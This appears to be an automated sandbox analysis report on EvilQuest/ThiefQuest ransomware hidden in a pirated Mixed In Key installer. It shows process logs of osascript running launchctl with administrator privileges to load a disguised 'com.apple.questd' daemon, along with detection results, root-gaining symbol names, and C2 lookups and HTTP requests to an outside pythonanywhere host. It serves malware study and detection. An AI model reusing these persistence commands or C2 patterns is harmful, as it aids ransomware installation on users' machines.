launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 671, Parent: 669)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 673, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 677, Parent: 673)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 678, Parent: 677)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 679, Parent: 677)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 700, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 701, Parent: 700)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 702, Parent: 701)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 703, Parent: 701)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 704, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 705, Parent: 704)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 706, Parent: 705)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 707, Parent: 705)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 708, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 709, Parent: 708)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 710, Parent: 709)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 711, Parent: 709)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 712, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 713, Parent: 712)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 714, Parent: 713)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 715, Parent: 713)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

sh New Fork (PID: 716, Parent: 647)

osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

osascript New Fork (PID: 717, Parent: 716)

security_authtrampoline (MD5: 1f0524c40489885f3c9320bace20f852) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

uid (MD5: 4a7c7d86c14c0b15494f8007f7b46aae) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

sh New Fork (PID: 718, Parent: 717)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist

sh New Fork (PID: 719, Parent: 717)

launchctl (MD5: 17fad4b994d600d0a5b6bc02b55c2c80) Arguments: launchctl start questd

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
patch	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security

Dropped Files

Source	Rule	Description	Author
/Users/berri/Library/AppQuest/com.apple.questd	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
/private/var/root/Library/.osPtRL91w	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Utils/.BC.T_nXMCY0	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Utils/.BC.T_EdCtGl	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
/Users/berri/Library/.b0MbtGgfS	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
/Library/AppQuest/com.apple.questd	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
/Users/berri/Library/AppQuest/com.apple.questd	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
/Library/AppQuest/com.apple.questd	JoeSecurity_EvilQuest	Yara detected EvilQuest Ransomware	Joe Security
Click to see the 3 entries

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: /Users/berri/Library/AppQuest/com.apple.questd	Avira: detection malicious, Label: OSX/EvilQuest.lqmhg
Source: /Library/AppQuest/com.apple.questd	Avira: detection malicious, Label: OSX/Filecoder.pskpy

Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _tpdcrypt
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _tpcrypt
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _eip_encrypt
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _eip_decrypt
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: __generate_xkey
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: __tp_decrypt
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: __tp_encrypt
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _tpdcrypt
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _tpcrypt
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _eip_encrypt
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _eip_decrypt
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: __generate_xkey
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: __tp_decrypt
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: __tp_encrypt
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _tpdcrypt
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _tpcrypt
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _eip_encrypt
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _eip_decrypt
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: __generate_xkey
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: __tp_decrypt
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: __tp_encrypt
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _tpdcrypt
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _tpcrypt
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _eip_encrypt
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _eip_decrypt
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: __generate_xkey
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: __tp_decrypt
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: __tp_encrypt
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _tpdcrypt
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _tpcrypt
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _eip_encrypt
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _eip_decrypt
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: __generate_xkey
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: __tp_decrypt
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: __tp_encrypt
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _tpdcrypt
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _tpcrypt
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _eip_encrypt
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _eip_decrypt
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: __generate_xkey
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: __tp_decrypt
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: __tp_encrypt
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _tpdcrypt
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _tpcrypt
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _eip_encrypt
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _eip_decrypt
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: __generate_xkey
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: __tp_decrypt
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: __tp_encrypt
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _tpdcrypt
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _tpcrypt
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _eip_encrypt
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _eip_decrypt
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: __generate_xkey
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: __tp_decrypt
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: __tp_encrypt

Privilege Escalation:

Contains symbols with suspicious names likely related to privilege escalation

Show sources

Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _run_as_admin
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _run_as_admin_async
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _ei_rootgainer_main
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: __ei_rootgainer_elevate
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _acquire_root
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _run_as_admin
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _run_as_admin_async
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _ei_rootgainer_main
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: __ei_rootgainer_elevate
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _acquire_root
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _run_as_admin
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _run_as_admin_async
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _ei_rootgainer_main
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: __ei_rootgainer_elevate
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _acquire_root
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _run_as_admin
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _run_as_admin_async
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _ei_rootgainer_main
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: __ei_rootgainer_elevate
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _acquire_root
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _run_as_admin
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _run_as_admin_async
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _ei_rootgainer_main
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: __ei_rootgainer_elevate
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _acquire_root
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _run_as_admin
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _run_as_admin_async
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _ei_rootgainer_main
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: __ei_rootgainer_elevate
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _acquire_root
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _run_as_admin
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _run_as_admin_async
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _ei_rootgainer_main
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: __ei_rootgainer_elevate
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _acquire_root
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _run_as_admin
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _run_as_admin_async
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _ei_rootgainer_main
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: __ei_rootgainer_elevate
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _acquire_root

Executes shell scripts with administrative rights

Show sources

Source: /bin/sh (PID: 642)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 648)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 652)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 656)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 672)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 680)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 684)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 688)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 692)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 696)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 723)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 731)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 660)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 664)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 668)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 673)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 700)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 704)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 708)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 712)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 716)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030613 ET TROJAN ThiefQuest CnC Domain in DNS Lookup 192.168.11.11:51353 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com

Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.37.204
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.37.204
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com
Source: global traffic	HTTP traffic detected: GET /ret.txt HTTP/1.0Host: andrewka6.pythonanywhere.com

Source: unknown

DNS traffic detected: queries for: andrewka6.pythonanywhere.com

Source: /Library/mixednkey/toolroomd (PID: 639)	Reads from socket in process: data
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Reads from socket in process: data

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Jun 2021 17:14:55 GMTContent-Type: text/htmlContent-Length: 2921Connection: closeETag: "6048c864-b69"Server: PythonAnywhereData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 